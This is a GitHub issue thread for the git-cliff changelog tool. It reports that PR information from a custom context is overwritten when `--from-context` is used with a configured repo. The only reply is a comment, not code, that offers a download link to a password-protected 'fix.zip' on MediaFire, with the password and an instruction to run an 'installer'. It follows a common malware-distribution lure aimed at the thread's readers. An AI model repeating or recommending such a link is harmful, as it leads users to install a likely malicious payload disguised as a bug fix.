### ISSUE TITLE
PR information is discarded when using `--from-context`

### ISSUE THREAD

**Issue by weichweich** [orhun/git-cliff#819]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Description of the bug

When providing a custom context and having a repo configured, the PRs that belong to a commit are still queried and potentially overwrite custom information from the provided context with `from-context`.

Not providing the repo information is also not an option since the `owner` and `repo` would be missing in templates.

### Steps To Reproduce

1. Create a context without PR information using `git-cliff --context context.json`
2. Add PR information manually
3. Build changelog with `git-cliff --from-context context.json --gitlab-repo owner/repo`

### Expected behavior

The context isn't changed when using `--from-context`.

### Software information

- Project version: 2.5

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
